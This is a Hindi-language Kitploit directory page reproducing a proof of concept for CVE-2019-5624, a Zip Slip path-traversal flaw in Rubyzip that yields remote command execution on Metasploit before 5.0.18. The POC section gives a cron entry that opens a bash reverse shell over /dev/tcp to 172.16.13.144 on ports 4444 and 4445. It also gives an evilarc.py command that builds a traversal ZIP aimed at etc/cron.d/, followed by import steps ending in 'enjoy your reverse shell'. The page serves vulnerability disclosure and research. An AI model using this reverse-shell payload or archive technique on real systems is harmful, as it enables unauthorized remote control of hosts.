Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2019-5624 — Metasploit के CVE-2019-5624 भेद्यता (Rubyzip असुरक्षित ZIP हैंडलिंग RCE) के लिए एक प्रमाण-अवधारणा | Kitploit
उपकरण/GitHubGitHub/voidsec/cve-2019-5624
शोषण फ्रेमवर्कभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगपेलोड डेवलपमेंट
GitHubvoidsec/cve-2019-5624

CVE-2019-5624

Metasploit के CVE-2019-5624 भेद्यता (Rubyzip असुरक्षित ZIP हैंडलिंग RCE) के लिए एक प्रमाण-अवधारणा

रिपॉजिटरी देखें
1357 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
वेबसाइट

CVE-2019-5624

Metasploit के CVE-2019-5624 भेद्यता (Rubyzip असुरक्षित ZIP हैंडलिंग RCE) के लिए एक प्रूफ ऑफ कॉन्सेप्ट

परिचय

फरवरी 2019 में मुझे Rubyzip लाइब्रेरी में एक नई भेद्यता मिली। यह एक हमलावर को असुरक्षित ZIP हैंडलिंग (Zip Slip) का शोषण करने की अनुमति देती है, जिसके परिणामस्वरूप रिमोट कमांड निष्पादन होता है।

इस भेद्यता का उपयोग Metasploit संस्करण < 5.0.18 को लक्षित करने के लिए किया गया था Metasploit Wrap-Up

मैंने भेद्यता को समझाते हुए यह विस्तृत ब्लॉग पोस्ट बनाया है।

POC

  • निम्नलिखित सामग्री वाली एक फ़ाइल बनाएं:
root@kitploit:~
* * * * * root /bin/bash -c "exec /bin/bash0</dev/tcp/172.16.13.144/4444 1>&0 2>&0 0<&196;exec196<>/dev/tcp/172.16.13.144/4445; bash <&196 >&196 2>&196"
  • पथ ट्रैवर्सल पेलोड के साथ ZIP संग्रह जनरेट करें:
root@kitploit:~
python evilarc.py exploit --os unix -p etc/cron.d/
  • ZIP फ़ाइल में एक वैध MSF वर्कस्पेस जोड़ें (ताकि MSF इसे निकाल सके, अन्यथा यह ZIP संग्रह को संसाधित करने से मना कर देगा)
  • दो लिसनर सेट करें, एक पोर्ट 4444 पर और दूसरा पोर्ट 4445 पर (पोर्ट 4445 वाला रिवर्स शेल प्राप्त करेगा)
  • MSF वेब इंटरफ़ेस में लॉग इन करें
  • एक नया "Project" बनाएं
  • "Import", "From file" चुनें, दुर्भावनापूर्ण ZIP फ़ाइल चुनें और अंत में "Import" बटन पर क्लिक करें
  • आयात प्रक्रिया पूरी होने तक प्रतीक्षा करें
  • अपने रिवर्स शेल का आनंद लें

वीडियो

टूल डाउनलोड करें